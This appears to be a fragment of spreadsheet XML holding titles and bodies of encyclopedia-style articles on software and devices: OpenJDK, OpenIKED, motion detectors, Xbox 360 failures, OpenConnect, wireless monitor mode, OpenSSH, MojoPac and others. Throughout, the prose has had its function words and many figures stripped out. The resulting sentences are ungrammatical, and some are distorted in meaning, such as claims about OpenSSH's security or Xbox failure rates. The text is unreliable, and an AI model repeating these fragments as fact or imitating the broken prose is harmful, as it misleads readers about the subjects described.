users windows azure cloud. zulu available free download community site zulu.org. also possible zulu amazon services canonical's juju charm store, docker hub, azul systems repositories. azul contributes fixes enhancements back openjdk project several project committers staff.since april 2016 unsupported community builds openjdk microsoft windows github project ojdkbuild released pace updates oracle jdk. from build 8u151 msi-installer offers optional component using java start based icedtea-web project. 2020, port openjdk openvms itanium platform released.the number external contributions openjdk growing since project inception. openjdk released september 2018, received external fixes brought jeps (features), contributed community. namely, 315: "improve aarch64 intrinsics" (contributed bellsoft), 318: "epsilon: no-op garbage collector" hat) 331: "low-overhead heap profiling" (contributed google). collaboration ibm, apple, october 2010, ibm, biggest participant apache harmony project, decided join oracle openjdk project, effectively shifting efforts harmony openjdk. sutor, ibm's head linux open source, blogged "ibm shifting development effort apache project harmony openjdk".on november 2010, apple inc. (just three weeks deprecating java runtime port) oracle corporation announced openjdk project apple contribute components, tools technology required java implementation including 32-bit 64-bit hotspot-based java virtual machine, class libraries, networking stack foundation graphical client.on january 2011, port project created openjdk, apple made first public contribution code project. initial apple contribution built openjdk port.in july 2011, announced officially joined openjdk project. also free java implementations references external links main site openjdk builds oracle openjdk builds adoptium openjdk builds microsoft build openjdk java 2018: change only constant keynote mark reinhold zero shark: zero-assembly port openjdk openjdk official source code</t>
  </si>
  <si>
    <t>OpenIKED</t>
  </si>
  <si>
    <t>openiked free, permissively licensed internet exchange (ikev2) daemon developed part openbsd project. external links iked(8) openbsd system manager's manual ikectl(8) openbsd system manager's manual iked.conf(5) openbsd file formats manual</t>
  </si>
  <si>
    <t>Motion detector</t>
  </si>
  <si>
    <t>motion detector electrical device utilizes sensor detect nearby motion. such device often integrated component system automatically performs task alerts user motion area. they form vital component security, automated lighting control, home control, energy efficiency, useful systems. overview active electronic motion detector contains optical, microwave, acoustic sensor, well transmitter. however, passive contains sensor senses signature moving object emission reflection. changes optical, microwave acoustic field device's proximity interpreted electronics based several technologies. most low-cost motion detectors detect motion distances feet (4.6 specialized systems expensive either increased sensitivity much longer ranges. tomographic motion detection systems cover much larger areas radio waves senses frequencies penetrate walls obstructions, detected multiple locations. motion detectors found wide commercial applications. common application activating automatic door openers businesses public buildings. motion sensors also widely used lieu true occupancy sensor activating street lights indoor lights walkways, lobbies staircases. smart lighting systems, energy conserved powering lights duration timer, person presumably left area. motion detector among sensors burglar alarm used alert home owner security service detects motion possible intruder. such detector also trigger security camera record possible intrusion. sensor technology several types motion detection wide use: passive infrared (pir) passive infrared (pir) sensors sensitive person's skin temperature emitted black-body radiation mid-infrared wavelengths, contrast background objects room temperature. energy emitted sensor, thus name passive infrared. this distinguishes electric instance (not usually considered motion detector), crossing person vehicle interrupts visible infrared beam. these devices detect objects, people, animals picking one's infrared radiation. microwave these detect motion principle doppler radar, similar radar speed gun. continuous wave microwave radiation emitted, phase shifts reflected microwaves motion object toward away from) receiver result heterodyne signal audio frequency. ultrasonic ultrasonic transducer emits ultrasonic wave (sound frequency higher human hear) receives reflections nearby objects. exactly doppler radar, heterodyne detection received field indicates motion. detected doppler shift also audio frequencies (for walking speeds) since ultrasonic wavelength around centimeter similar wavelengths used microwave motion detectors. potential drawback ultrasonic sensors sensor sensitive motion areas coverage undesired, instance, reflections sound waves around corners. such extended coverage desirable lighting control, goal detection occupancy area, opening automatic door, example, sensor selective traffic path toward door superior. tomographic motion detector these systems sense disturbances radio waves pass node node mesh network. they ability detect large areas completely sense walls obstructions. tomographic motion detection systems dedicated hardware, wireless-capable devices combination two. other wireless capable devices nodes mesh receiving software update. video camera software with proliferation low-cost digital cameras able shoot video, possible output camera detect motion field view using software. this solution particularly attractive intent record video triggered motion detection, hardware beyond camera computer needed. since observed field normally illuminated, considered another passive technology. however, also used together near-infrared illumination detect motion dark, illumination wavelength undetectable human eye. gesture detector photodetectors infrared lighting elements support digital screens detect hand motions gestures machine learning algorithms. dual-technology motion detectors many modern motion detectors combinations different technologies. while combining multiple sensing technologies detector help reduce false triggering, expense reduced detection probabilities increased vulnerability. example, many dual-tech sensors combine sensor microwave sensor unit. motion detected, sensors must trip together. this lowers probability false alarm since heat light changes trip microwave, moving tree branches trigger microwave pir. intruder able fool either microwave, however, sensor detect it.often, technology paired another model maximize accuracy reduce energy use. draws less energy emissive microwave detection, many sensors calibrated sensor tripped, activates microwave sensor. latter also picks intruder, alarm sounded. also twilight switch heat detector motion capture motion controller video game consoles pickup (music technology) proximity sensor remote camera smoke detector references</t>
  </si>
  <si>
    <t>RingCube vDesk</t>
  </si>
  <si>
    <t>ringcube vdesk desktop virtualization product ringcube technologies. vdesk client virtualization virtual workspace platform virtualizes entire desktop operating system level. platform deployed four different modes: local external device, streamed across network, conjunction existing solutions. also desktop virtualization mojopac similar product also ringcube technologies portable application creators windows references external links official site</t>
  </si>
  <si>
    <t>Ring of Death</t>
  </si>
  <si>
    <t>xbox video game console subject number technical problems failures render unusable. however, many issues identified series glowing lights flashing face console; three flashing lights (nicknamed "red ring death" "rrod") infamous. there also issues arise console, discs becoming scratched drive "bricking" consoles dashboard updates. since release november 2005, many articles appeared media portraying xbox 360's failure rates, latest estimate warranty provider squaretrade 23.7% 2009, currently highest estimate 54.2% game informer survey.there legal action taken attempting hold microsoft responsible xbox 360's failure rate provide compensation affected. general hardware failure errors three flashing lights around xbox power button instead four green lights indicating normal operation represent internal problem requires service. this error soon nicknamed "red ring death", echoing windows' blue screen death error. warning signs include freeze-ups, graphical problems middle gameplay, checkerboard pinstripe patterns screen, sound errors; mostly consisting extremely loud noises affected volume control, console responding power button pressed turn off. these events happen several times hardware failure occurs, all. console freezes occasionally, error necessarily follow. technical problems seem affect generations consoles others, xenon zephyr. those problems also cause freezing screens. this error code usually caused failure hardware components, although indicate console receiving enough power power supply, either faulty power supply power supply cable fully inserted console. flashing lights also caused power surges; console connected outlet receives power surge, failure lights appear long console plugged outlet. turning console, unplugging power cables plugging back restarting console issue cases.distinct general hardware failure similar-looking, much less serious, error warning four lights appear, case console detect cable plugged however, error code generated models equipped hdmi output. while main cause cable, rare cases, lights mean serious problem console. when lights indicate serious issue, followed digit error code, similar ring. four lights sometimes also seen power surges brief power outages occur console running, console needs unplugged plugged back reset error. lights appear system overheated. xbox models, power button utilizes different design incorporate style lighting past models used. flashing light means console overheating, similar two-light error code original model xbox 360; however, on-screen message also appears, telling user console automatically power protect overheating. solid light similar one-light error error message displayed three-light error code error message absent. response rate failure early months console's launching, microsoft stated xbox 360's failure rate within consumer electronics industry's typical nevertheless, microsoft released official statistics failure rate various versions console.on july 2007, peter moore, vice president microsoft's interactive entertainment business division published open letter recognizing console's problems, well announcing three-year warranty original date purchase every xbox console experiences "general hardware failure" indicated three flashing leds console. source identified team leader architect creation xbox xbox founding member xbox team provided insight high rate failures. interviews suggest xbox units fail early life problems system design, parts supply, material reliability, manufacturing issues well system tolerant faults. these issues alleged results decisions management microsoft's xbox team inadequate testing resources prior console's release. second source cited that, time, yield test production runs. every test units found defective.years leaving microsoft, moore recalled preparing tell microsoft, steve ballmer, planned response incident, "we've tell steve, here's need fedex empty customer problem would call fedex return label send box, would fedex back always remember $240m fedex. sickening. interviews. figure out. there theory. changed solder, fans, lead-free. think somehow heat coming drying solder, normal stuff we'd used, meet european standards take lead out. said, 'what's going cost?' remember taking deep breath, looking robbie, saying, think $1.15bn, steve.' said, it.' there hesitation. made decision then, tried fudge problem, xbox brand xbox exist today."on february 2008, game developers conference 2008, microsoft announced "failure rate officially dropped", without mentioning specifics. month, electronics warranty provider squaretrade published examination 1040 xbox 360s said suffered failure rate 16.4% (one six). failures, general hardware failure (and thus fell year extended warranty). remaining covered extended warranty, disc read errors, video card failures, hard drive freezes, power issues disc tray malfunctions. squaretrade also stated estimates likely significantly lower reality time span sample (six months), eventual failure many consoles occur within time span fact owners deal squaretrade consoles repaired directly microsoft much publicized extended rrod warranty. people experience problem find send xbox away repair replacement take weeks repair replace. during time xbox replaced, microsoft keep client(s) updated current status xbox whether repaired replaced. october 2008 class action lawsuit filed california microsoft rrod problem.on august 2009, squaretrade published report saying "early indications point rrod problem abating 2009", projecting 1-year failure rates release jasper chipsets might actual fail rates rrod problems slightly q109, total failure rates hardware problems 12%.in june 2010, microsoft released "slimmer" xbox 360. these models indicate hardware failure differently original; outer ring segments cannot turn anymore. microsoft said henceforth errors displayed center power button changing green red. additionally, microsoft longer give 3-year warranty "general failure" errors, xbox slim "constitutes whole design". causes until december 2021, official cause problem revealed microsoft, leading third parties make many different theories exact cause problem was. electronics industry newspaper times reported problems started graphics chip. microsoft designed chip in-house traditional asic vendor goal saving money asic design costs. after multiple product failures, microsoft went back asic vendor chip redesigned would dissipate less heat.german computer magazine blamed problem primarily wrong type lead-free solder, type exposed elevated temperatures extended periods time becomes brittle develop hair-line cracks almost irreparable. article also revealed representatives three largest xbox resellers world games, gamestop, best buy) claimed failure rate xbox 33%, micromart, largest repair shop united kingdom, stopped repairing xbox 360s unable fully repair defective systems. because nature problem, micromart could make temporary repairs, many "repaired" systems failing weeks. time micromart receiving 2,500 defective consoles u.k. alone.some articles also suggested hardware condition also caused using xbox kinect xenon generation xbox.on december 2021, part 6-part documentary history xbox, microsoft revealed determined red-ring issue caused cracking solder joints inside flip chip package, connecting substrate interposer, result thermal stress heating cooling back system power cycled. scratched discs almost time xbox released late 2005, customers began reporting circumferential scratches found discs used xbox consoles. almost years later, february 2007, site "the llamma's adventures" investigated matter concluded xbox disc drives lack mechanism secure disc solidly place. tilting moving consoles drives, operating disc spinning inside, potentially cause damage disc cases rendering disc unplayable result. discs also scratched stationary consoles normal use. side disc also scratched disc tray malfunctions closing disc position. also, technical engineers already knew problem release confirm microsoft list solutions. according microsoft, decreasing disc rotation would cause games take excessive amounts time load disc, adding bumper disc tray would cost cents console—a total million dollars causing delay xbox release. 2005, accused many technical xbox problems poor lack solutions warranty. according reports news media, xbox design still scratches discs console moved spinning operation. however, xbox xbox shipped sticker informing users moving console powered poses risks, effectively removing responsibility microsoft. disc replacement although discs scratched xbox covered warranty, microsoft's xbox disc replacement program sell customers copy discs scratched xbox 360, published countries xbox originally sold, cost $20. published list games qualify, however, limited. halo limited edition replaced cost february 2008 according xbox disc replacement program's main site. other publishers contacted directly disc exchange, unclear whether replace discs cost. game publisher electronic arts details specific program problem requires disc original receipt, requirement game must purchased within days request replacement disc, request replacement charge $25.in december 2005 (shortly xbox 360's release united states canada november 2005 around release europe asia early december 2005), reports unidentifiable noises xbox appearing internet message boards. response problem, microsoft offered december 2005 replace perfect dark zero video game "even game scratched." scratched disc problem reportedly affected small percentage xbox units, however became apparent december 2005, message board reports growing media coverage.often problem caused user ignoring warning manufacturer tells avoid moving console disc drive. kassa’s february 2007 investigation xbox scratched disc problem received little media coverage 2006; however, february 2007, dutch television program kassa investigated several complaints dutch consumers circular scratches made xbox discs. some consumers claimed discs became unreadable. kassa investigation traced problem design defect xbox optical lens restrained sufficiently. asserting microsoft least chain suppliers aware problem, kassa noted microsoft's "tsst" versions samsung dvd-drive lack rubber cushions around optical lens identical samsung drives sold rubber cushions. kassa also noted affected xbox 360s seem produced towards 2006. kassa’s april 2007 investigation during february 2007 investigation report, kassa stated either xbox 360s without protective pads would spontaneously scratch discs, complaints xbox users moved xbox use, used unstable setup. kassa's february 2007 investigation left open question whether consumers contributed rounded scratch problem moving xbox (tsst version) playing disc. this resulted kassa receiving additional 1,000 complaints subsequent months, many consumers denying xbox moved scratching occurred, placed unstable position.prompted consumer reaction february 2007 report, kassa performed several tests xbox units consumers claimed xbox problem. kassa stabilized consoles positioned location remote contact anyone. results laboratory conditions test revealed nine tested xbox units spontaneously scratched disc five hours gaming. consoles also tested standing upright, test revealed three nine tested xbox 360s significantly scratched discs. video complete investigation, meticulously documenting methodology, relevant details tests, made ready aired april 2007. videos also distributed english subtitles, dutch (note kassa produced uploaded videos itself, therefore copyright violation reproduce links here. they also found kassa's website together press information case.) test setup details found online, complete movie kassa program meticulously documenting methodology used test found online dutch) weeks aired, however, kassa solicited input microsoft netherlands. airing april 2007 show, kassa received response microsoft netherlands stating result regular possible scratches discs arise", microsoft netherlands "would seek solution dutch customers problem". additionally, microsoft released following statement days show, april 2007: fact participate experiment done kassa little insight methodology used, cannot comment specifically outcome. while aware discs potentially scratched normal wear tear, received widespread reports issue highlighted here. that said, important customers best gaming experiences possible, claims obviously concerning encourage xbox customer believes discs scratched manner identified kassa, contact examine console make appropriate repairs necessary order restore console full working order, well provide customers information obtain replacement discs need them. microsoft netherlands accepts complaints users (while within warranty period), offers replace xbox free charge. whether microsoft netherlands also replace scratched discs still unclear. after official broadcast, continuation show viewed on-line, minutes show) customer shown calling microsoft help-desk, told microsoft replace xbox denied promise replace scratched games. there reports regions microsoft replace scratched discs published microsoft. european commission’s june 2007 investigation disc scratches june 2007, european commissioner consumer protection meglena kuneva, talking producers "kassa" dutch consumer organizations, announced european commission would investigate xbox scratching problems, would microsoft xbox replacement program whole europe. expected microsoft's answer within week. informal sources microsoft's response deny problem exists, stating "the users blame". kuneva react response, months later (4th quarter 2008) ec's (meglena kuneva's) news site still silent microsoft's response, result "investigation". lawsuit sued microsoft claiming xbox scratches game discs, saying consoles "negligently designed manufactured." lawsuit filed july 2007 florida federal court, jorge brouwer says microsoft received thousands complaints replaced scratched discs. lawsuit seeks class action status.three firms fort lauderdale, florida; angeles, california; seattle, washington investigating consumer complaints regarding xbox 360. firms filed lawsuits united states district court western district washington seattle behalf proposed nationwide class customers suffered scratched game discs using xbox 360. lawsuit seeks class certification reimbursement customers cost games damaged console; reimbursement customers paid microsoft corporation limited disc replacement program offered microsoft games; repair consoles free charge prevent disc scratching; and/or reimbursement customers paid aftermarket repair solution. watchdog investigation xbox disc scratches (2009) march 2009, bbc's consumer interest programme watchdog performed investigation console scratches discs, microsoft found issues multiple reportedly defective consoles. sealed test, protected outside interference beyond accessing games, found problems either console. however, test attempted simulate normal household vibrations produced disc scratch previously problematic console. currently, microsoft still maintains user's fault discs damaged, "makes clear multiple warnings move console disc inside." also maintains minority customers affected issue. however, company comment tests. other november 2006 update update patch released november 2006 reported "brick" consoles, rendering useless. obvious issue occurs installation patch, console immediately reboots shows error message. usually, error code shown directly booting animation. response november 2006 update error "bricked" console, california filed class action lawsuit microsoft washington federal court early december 2006. lawsuit seeks million damages free repair console rendered unusable update. this second lawsuit filed microsoft, first filed december 2005, shortly 360's launch. following microsoft's extension xbox warranty full year, previous days, california man's attorney confirmed seattle post intelligencer lawsuit resolved confidential terms. video failure 2007, technology gaming blogs began reporting problems xbox losing video output. problems characterized blank, staticky, grayscale video output proper functioning audio output flashing lights console. complete video failure sometimes preceded graphical glitches irregular saturation green and/or colors.others complained able view certain movies/dvds hdtv using hdmi cable. this likely caused hdtv non-hdcp compliant. nyko intercooler nyko intercooler reported general hardware failure number consoles, well scorching power input. microsoft stated peripheral drains much power console (the intercooler power cord installed xbox power supply console itself) cause faults occur, stated consoles fitted peripheral warranties null void. nyko released updated intercooler uses power source. nyko claims problem longer occurs versions cooler. however, microsoft still considers unlicensed add-on void warranty machines showing signs use. there data available indicate whether intercooler really decrease chance hardware failure. however, intercooler fails, cause overheating problems. intercooler also melt onto 360, melt powercord inside itself, make extremely hard remove. "new xbox experience" update issues november 2008, microsoft released "new xbox experience" (nxe). this update provided streaming netflix capability avatars; however, users reported update caused consoles properly read optical media. others reported update disabled audio hdmi connections. microsoft spokesperson stated company "aware handful xbox live users experiencing audio issues, diligently monitoring issue working towards solution." microsoft released patch february 2009 hdmi audio issues. error error indicated lower-right quadrant ring indicator flashes displays error message multiple languages: "system error. contact xbox customer support", code bottom. error caused failure communication edram gpu. this usually failure flip chip connection dies substrate, failing edram. april 2009, error covered three-year extended warranty, customers previously paid microsoft out-of-warranty service correct error received refund.the error sometimes described many "green screen death" "black screen death" early versions errors almost jet-black background dark green. later versions would show completely jet-black background. reports impending red-light failure stem users report abnormal display poor, grainy video well black dots artifacts appearing screen. vertical green strokes screen also indicate video system malfunction, preceding rrod error. xbox website states error. secondary error code xbox consoles hardware failure display secondary error code blinking sequence leds sync button held eject button pressed four times. number lights represents digit lights error code 0001 represent defect power supply, rather xbox itself, short within xbox, blown capacitor. also microsoft corp. baker: u.s. supreme court case based problems blue screen death references external links microsoft xbox support official website</t>
  </si>
  <si>
    <t>OpenConnect</t>
  </si>
  <si>
    <t>openconnect open-source software application connecting virtual private networks (vpn), implement secure point-to-point connections. originally written open-source replacement cisco's proprietary anyconnect client, supported several cisco routers. openconnect client added support juniper networks' version 7.05, palo alto networks' globalprotect version 8.00, pulse/junos version 8.04, fortinet fortigate, bigip, array networks version 8.20. protocols cisco anyconnect cisco anyconnect vpns utilize authenticate configure routing, dtls efficiently encrypt transport tunneled traffic, fall back tls-based transport firewalls block udp-based traffic. dtls protocol used cisco anyconnect servers based non-standard, pre-release draft dtls 1.0, support dtls standard added 2018. dtls cisco's proprietary anyconnect clients servers originally built patched, 2007 release openssl 0.9.8f, implemented pre-release version dtls compatible dtls standardized 4347. because this, difficult make openconnect implement cisco-compatible version dtls without linking openssl. explicit support cisco's non-standard version dtls included openssl 0.9.8m (where known dtls1_bad_ver) gnutls 3.2.1 (where known gnutls_dtls0_9). newer versions cisco's anyconnect clients servers support dtls standardized on-the-wire form (rfc 6347), though continue non-standard mechanism (based session resumption) dtls exchange.modern versions openconnect built either gnutls openssl tls, dtls, cryptographic primitives. other protocols openconnect client also implements juniper, junos pulse, globalprotect protocols. these similar structure anyconnect protocol: authenticate configure routing tls, except efficient, encrypted transport tunneled traffic (instead dtls), fall back tls-based transport. version 8.20, also implements fortinet fortigate bigip, dtls, additionally based point-to-point protocol (ppp).as march 2022, support several proprietary protocols development: array networkssonicwall (ppp-based)check point architecture openconnect client written primarily contains much infrastructure necessary additional protocols operating similar flow, connect common user interface: initial connection server authentication phase https (using html forms, client certificates, xml, etc.) server-provided routing configuration, protocol-agnostic format, processed vpnc-script data transport phase udp-based tunnel (dtls esp), fallback tls-based tunnel built-in event loop handle dead peer detection, keepalive, rekeying, etc.openconnect built either gnutls openssl libraries tls, dtls cryptographic primitives. platforms openconnect available solaris, linux, openbsd, freebsd, macos, graphical user interface clients windows, gnome, kde. graphical client openconnect also available android devices, integrated router firmware packages openwrt. server 2013, openconnect project also offers anyconnect-compatible server, ocserv, thus offers full client-server solution. openconnect ocserv implement extended version anyconnect protocol, proposed internet standard. both openconnect ocserv strive maintain backwards-compatibility cisco anyconnect servers clients. notable uses openconnect's implementation anyconnect protocol sufficiently complete, cisco's phone devices embed release openconnect order connect cisco vpns. references external links openconnect project homepagesome useful usage information. https://wiki.archlinux.org/index.php/openconnect</t>
  </si>
  <si>
    <t>Monitor mode</t>
  </si>
  <si>
    <t>monitor mode, rfmon (radio frequency monitor) mode, allows computer wireless network interface controller (wnic) monitor traffic received wireless channel. unlike promiscuous mode, also used packet sniffing, monitor mode allows packets captured without associate access point network first. monitor mode applies wireless networks, promiscuous mode used wired wireless networks. monitor mode eight modes 802.11 wireless adapter operate master (acting access point), managed (client, also known station), hoc, repeater, mesh, wi-fi direct, tdls monitor mode. uses uses monitor mode include: geographical packet analysis, observing widespread traffic acquiring knowledge wi-fi technology hands-on experience. especially useful auditing unsecure channels (such protected wep). monitor mode also used help design wi-fi networks. given area channel, number wi-fi devices currently used discovered. this helps create better wi-fi network reduces interference wi-fi devices choosing least used wi-fi channels. software kismac kismet, combination packet analyzers read pcap files, provide user interface passive wireless network monitoring. limitations usually wireless adapter unable transmit monitor mode restricted single wireless channel, though dependent wireless adapter's driver, firmware, features chipset. also, monitor mode adapter check cyclic redundancy check (crc) values correct packets captured, captured packets corrupted. operating system support microsoft windows network driver interface specification (ndis) supported extensions monitor mode since ndis version first available windows vista. ndis supports exposing 802.11 frames upper protocol levels, previous versions exposed fake ethernet frames translated 802.11 frames. monitor mode support ndis optional feature implemented client adapter driver. implementation details compliance ndis specifications vary vendor vendor. many cases, monitor mode support properly implemented vendor. example, ralink drivers report incorrect readings realtek drivers include trailing 4-byte values.for versions windows prior windows vista, packet analyzer applications wildpackets' omnipeek tamosoft's commview wifi provide device drivers support monitor mode. linux's interfaces 802.11 drivers support monitor mode many drivers offer support. drivers (ralink, broadcom) every manufacturer’s provided driver doesn’t support monitor mode.freebsd, netbsd, openbsd, dragonfly also provide interface 802.11 drivers supports monitor mode, many drivers operating systems support monitor mode well. 10.4 later releases, drivers airport extreme network adapters allow adapter monitor mode. libpcap 1.0.0 later provides select monitor mode capturing operating systems. also promiscuous mode comparison open-source wireless drivers references external links airsnort faq: what difference monitor promiscuous mode? wayback machine (archived december 2014) list wi-fi adapters supporting monitor mode linux</t>
  </si>
  <si>
    <t>Mondo Rescue</t>
  </si>
  <si>
    <t>mondo rescue free disaster recovery software. supports linux (i386, x86-64, ia-64) freebsd (i386). it's packaged multiple distributions (red hat, rhel, fedora, centos, opensuse, sles, mandriva, debian, ubuntu, gentoo). also supports tapes, disks, devices, network cd/dvd backup media, multiple filesystems, lvm, software hardware raid. restoration done physical media including obdr tape support, cd/dvd/usb media, network pxe. mentioned free software directory,"[t]he emphasis stability ease use," since inception 2004. according ohloh, mondorescue development worth $6m. mondo uses linux distribution called mindi provide favorable post boot environment performing data restore. unlike disk clone solutions ready live provided mondo rescue, instead, included mindi package create custom turn-key live cd/dvds using exact linux kernel configuration system backed effect, bootable dvd/cd customized computer backed objective reduce possibility missing device drivers kernel incompatibilities arise using generic (vanilla) linux kernel pre-built live dvd/cd. also list disk cloning software references external links official website</t>
  </si>
  <si>
    <t>OpenSSH</t>
  </si>
  <si>
    <t>openssh (also known openbsd secure shell) suite secure networking utilities based secure shell (ssh) protocol, provides secure channel unsecured network client–server architecture.openssh started fork free program developed tatu ylönen; later versions ylönen's proprietary software offered communications security. openssh first released 1999 currently developed part openbsd operating system. openssh single computer program, rather suite programs serve alternatives unencrypted protocols like telnet ftp. openssh integrated several operating systems, namely microsoft windows, macos linux operating systems, portable version available package systems. history openbsd secure shell created openbsd developers alternative original software tatu ylönen, proprietary software. although source code available original ssh, various restrictions imposed distribution. openssh created fork björn grönvall's ossh fork tatu ylönen's original free 1.2.12 release, last license suitable forking. openssh developers claim application secure original, policy producing clean audited code released license, open-source license word open name refers. openssh first appeared openbsd 2.6. first portable release made october 1999. developments since included addition ciphers (e.g., chacha20-poly1305 january 2014), cutting dependency openssl (6.7, october 2014) extension facilitate public-key discovery rotation trusted hosts (for transition ed25519 public host keys, version march 2015). october 2015, microsoft announced openssh natively supported microsoft windows accessible powershell, releasing early implementation making code publicly available. openssh-based client server programs included windows since version 1803. client agent enabled available default, server optional feature-on-demand.in october 2019 protection private keys rest speculation memory side-channel attacks added openssh 8.1. development openssh developed part openbsd operating system. rather including changes operating systems directly openssh, separate portability infrastructure maintained openssh portability team, "portable releases" made periodically. this infrastructure substantial, partly openssh required perform authentication, capability many varying implementations. this model also used openbsd projects openntpd. openssh suite includes following command-line utilities daemons: scp, replacement rcp. sftp, replacement copy files computers. ssh, replacement rlogin, telnet allow shell access remote machine. ssh-add ssh-agent, utilities ease authentication holding keys ready avoid need enter passphrases every time used. ssh-keygen, tool inspect generate rsa, elliptic-curve keys used user host authentication. ssh-keyscan, scans list hosts collects public keys. sshd, server daemon.the openssh server authenticate users using standard methods supported protocol: password; public-key authentication, using per-user keys; host-based authentication, secure version rlogin's host trust relationships using public keys; keyboard-interactive, generic challenge–response mechanism, often used simple password authentication, also make stronger authenticators tokens; kerberos/gssapi. server makes authentication methods native host operating system; include using authentication system pluggable authentication modules (pam) enable additional authentication methods one-time passwords. however, occasionally side effects: using openssh, must root, root privileges typically required operate pam. openssh versions september 2003) allow disabled run-time, regular users sshd instances. openbsd, openssh uses dedicated sshd user default drop privileges perform privilege separation accordance principle least privilege, applied throughout operating system including xenocara server. features openssh includes ability secured channel data sent local, client-side unix domain sockets local, client-side ports "forwarded" (sent across secured channel) routing server side; forwarding server instructed send forwarded data socket host/port (the host could server itself, "localhost"; host computer, appears computer server originator data). forwarding data bidirectional, meaning return communication forwarded back client-side manner; known "ssh tunnel", used multiplex additional connections single connection since 2004, conceal connections, encrypt protocols otherwise unsecured, circumvent firewalls sending/receiving manner data port allowed firewall. example, window system tunnel created automatically using openssh connect remote host, protocols, http vnc, forwarded easily.tunneling tcp-encapsulating payload (such ppp) tcp-based connection (such ssh's port forwarding) known "tcp-over-tcp", induce dramatic loss transmission performance problem known "tcp meltdown"), virtual private network software instead tunnel connection protocol simpler tcp. however, often problem using openssh's port forwarding, many cases entail tcp-over-tcp tunneling; meltdown avoided openssh client processes local, client-side connection order actual payload sent, sends payload directly tunnel's connection server side, openssh server similarly "unwraps" payload order "wrap" routing final destination.in addition, third-party software includes support tunnelling ssh. these include distcc, cvs, rsync, fetchmail. operating systems, remote file systems mounted using tools sshfs (using fuse). socks proxy server created using openssh. this allows flexible proxying possible ordinary port forwarding. beginning version 4.3, openssh implements layer tun-based vpn. this flexible openssh's tunnelling capabilities, allowing applications transparently access remote network resources without modifications make socks. supported public types openssh supports following public types: ssh-dss (disabled run-time since openssh released 2015) ssh-rsa (disabled run-time since openssh released 2021) ecdsa-sha2-nistp256 (since openssh released 2011) ecdsa-sha2-nistp384 (since openssh 5.7) ecdsa-sha2-nistp521 (since openssh 5.7) ssh-ed25519 (since openssh released 2014) rsa-sha2-256 (since openssh released 2016) rsa-sha2-512 (since openssh 7.2) ecdsa-sk (since openssh released 2020) ed25519-sk (since openssh 8.2) ntru prime-x25519 (since openssh 9.0) vulnerabilities before version openssh, possible attacker recover bits plaintext success probability 2−14. vulnerability related encryption mode. mode arcfour ciphers vulnerable attack. local privilege escalation vulnerability existed openssh (cve-2015-6565) world-writable (622) devices, believed denial service vulnerability. with tiocsti ioctl, possible authenticated users inject characters users terminals execute arbitrary commands linux.malicious compromised openssh servers could read sensitive information client private login keys systems, using vulnerability relies undocumented connection-resuming feature openssh client, called roaming, enabled default client, supported openssh server. this applies versions (released march 2010) openssh client, fixed openssh 7.1p2, released january 2016. numbers associated vulnerability cve-2016-0777 (information leak) cve-2016-0778 (buffer overflow). trademark february 2001, tatu ylönen, chairman communications security informed openssh development mailing list company intended assert ownership "ssh" "secure shell" trademarks, sought change references protocol "secsh" "secsh", order maintain control "ssh" name. proposed openssh change name order avoid lawsuit, suggestion developers resisted. openssh developer damien miller replied urging ylönen reconsider, arguing "ssh" long since generic trademark.at time, "ssh", "secure shell" "ssh" appeared documents proposing protocol open standard. without marking within proposal registered trademarks, ylönen risk relinquishing exclusive rights name means describing protocol. improper trademark, allowing others trademark incorrectly, results trademark becoming generic term, like kleenex aspirin, opens mark others. after study uspto trademark database, many online pundits opined term "ssh" trademarked, merely logo using lower case letters "ssh". addition, years company's creation time began defend trademark, openssh receiving threats legal repercussions, weighed trademark's validity.both developers openssh ylönen members ietf working group developing standard; several meetings group denied ylönen's request rename protocol, citing concerns would precedent trademark claims ietf. participants argued "secure shell" "ssh" generic terms could trademarks. also comparison clients comparison servers file transfer protocol (sftp) notes references external links official website ssh(1) openbsd general commands manual sshd(8) openbsd system manager's manual openssh super user's cross reference (bxr.su) opengrok openssh windows ss64.com</t>
  </si>
  <si>
    <t>MojoPac</t>
  </si>
  <si>
    <t>mojopac application virtualization product ringcube technologies. mojopac turns storage device portable computing environment. term "mojopac" used company refer software application, virtualized environment running inside software, storage device contains software relevant applications. mojopac supports popular applications firefox microsoft office, also high performance enough popular games world warcraft, minecraft half-life ringcube website currently forwarded citrix, apparently purchased company discontinued mojopac. usage initially mojopac device, user runs installer selects device attached system. once mojopac installed, creates executable root device along autorun file gives user option starting mojopac environment automatically device plugged (subject host configured). once application started, windows desktop (with wallpaper, icons, shell, etc.) started virtualized mojopac environment. application runs inside environment runs device without affecting filesystem host. user installs applications (including microsoft office, adobe photoshop, firefox) portable storage device simply running installer inside environment. user switch host environment mojopac environment using mojobar screen. once user done applications, exit mojopac eject device. applications different computer, user need reinstall application. user plug portable storage device windows computer. user's settings, applications, documents function irrespective computer portable storage device connected computer need special applications drivers installed mojopac, although administrator rights required "mojopac usher" installed host when portable storage device disconnected computer, personal information left behind computer. requirements requires windows home pro; windows 2000 supported, though vista planned supported near future never was). requires administrator access. special version, mojopac usher, universities locked environments administrator present [2]. limited user version development. security mojopac include features encrypt data drive, password protection system prevents person starting mojopac environment. files drive additional encryption, problematic mojopac device lost. however, different default windows installation mojopac used together otfe software freeotfe truecrypt provide desired strong encryption plausible deniability (just windows can). mojopac device secured using type software reasonably safe case theft. because virtualization performed mojopac, applications running inside mojopac environment cannot (generally) modify host. example, browsing history internet explorer browsers stored device rather host. similarly, malicious program tries delete c:\windows directory inside mojopac, files device deleted, files host machine remain. however, possible user modify mojopac's system files, reflected system files host current level isolation virtual environment host strong provided full machine virtualization technologies like vmware. ringcube stated known addressed future version mojopac. also comparison application launchers vdesk similar product produced ringcube portable application creators windows references external links official website wall street journal turning another computer into your lifehacker build stick' mojopac security episode mojopac laporte steve gibson discuss mojopac security podcast detailed article mojopac</t>
  </si>
  <si>
    <t>Openwall Project</t>
  </si>
  <si>
